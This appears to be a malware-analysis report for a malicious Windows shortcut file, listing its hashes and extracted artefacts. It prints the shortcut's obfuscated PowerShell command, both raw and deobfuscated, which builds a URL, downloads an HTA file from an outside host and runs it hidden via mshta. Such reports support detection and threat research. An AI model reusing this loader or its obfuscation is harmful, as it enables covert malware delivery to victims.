Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
cfb48c2cab273fcebb11028b7ce449fa
Sha1
95a61938ea99ea740476d451d5c642e617292cf4
Sha256
e17f553220905c179fb636a60e8cac9b29f2fb67d41cf86d8cef8a7c24e5d936
Sha384
4a726773c12341831d328200b78e7c3e64207f7218f1fd7a9689aa94e5d73aa73ff5f3d9fde10a0bae8f3a0b1da73e27
Sha512
a43f9bd291bcb95bab15f02041b23ad50d6bd514eda1bcdc935911bbf44784bec21e67dc7ab096a02673973db5d98aaeed08284895ac8c778991907d456527f7
SSDeep
48:8/Haxwc+hlG7whpvjuw9drj0dDvB68DvBV:8/H4wLU7wntzEvBvvBV
TLSH
AA51191CBED50226E6A6EA35BCB66216E57E3B43E73E4D8D41C14284067201EB46DF2E
File Structure
cfb48c2cab273fcebb11028b7ce449fa
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -ep Bypass -w Hidden -c "$T='';$S='uslni.ry-hfat:ve/p';$i=@((-343+353),(255-242),(-425+438),(-196+214),(214-212),(-403+417),(-13+30),(355-338),(-83+93),(-24+36),(102-95),(-203+210),(399-391),(434-425),(-107+109),(-460+465),(328-315),(-347+363),(160-154),(-4+8),(-464+467),(-326+343),(-255+256),(441-436),(-250+263),(-89+104),(-292+304),(283-271),(-222+229),(8+5),(484-467),(-53+66),(-195+206),(-79+85),(-490+500),(-119+132),(212-200));foreach ($x in $i){$T+=$S[$x - 1]};iwr $T -OutFile $env:TEMP\a.hta; start mshta $env:TEMP\a.hta"
Deobfuscated PowerShell

$T = "" $S = "uslni.ry-hfat:ve/p" $i = @(10, 13, 13, 18, 2, 14, 17, 17, 10, 12, 7, 7, 8, 9, 2, 5, 13, 16, 6, 4, 3, 17, 1, 5, 13, 15, 12, 12, 7, 13, 17, 13, 11, 6, 10, 13, 12) foreach ($x in $i) { $T += $S[$x - 1] } Invoke-WebRequest $T -OutFile $env:TEMP\a.hta start "mshta" $env:TEMP\a.hta
cfb48c2cab273fcebb11028b7ce449fa (2.91 KB)
File Structure
cfb48c2cab273fcebb11028b7ce449fa
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -ep Bypass -w Hidden -c "$T='';$S='uslni.ry-hfat:ve/p';$i=@((-343+353),(255-242),(-425+438),(-196+214),(214-212),(-403+417),(-13+30),(355-338),(-83+93),(-24+36),(102-95),(-203+210),(399-391),(434-425),(-107+109),(-460+465),(328-315),(-347+363),(160-154),(-4+8),(-464+467),(-326+343),(-255+256),(441-436),(-250+263),(-89+104),(-292+304),(283-271),(-222+229),(8+5),(484-467),(-53+66),(-195+206),(-79+85),(-490+500),(-119+132),(212-200));foreach ($x in $i){$T+=$S[$x - 1]};iwr $T -OutFile $env:TEMP\a.hta; start mshta $env:TEMP\a.hta"

Malicious

cfb48c2cab273fcebb11028b7ce449fa
Deobfuscated PowerShell

$T = "" $S = "uslni.ry-hfat:ve/p" $i = @(10, 13, 13, 18, 2, 14, 17, 17, 10, 12, 7, 7, 8, 9, 2, 5, 13, 16, 6, 4, 3, 17, 1, 5, 13, 15, 12, 12, 7, 13, 17, 13, 11, 6, 10, 13, 12) foreach ($x in $i) { $T += $S[$x - 1] } Invoke-WebRequest $T -OutFile $env:TEMP\a.hta start "mshta" $env:TEMP\a.hta

Malicious

cfb48c2cab273fcebb11028b7ce449fa > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙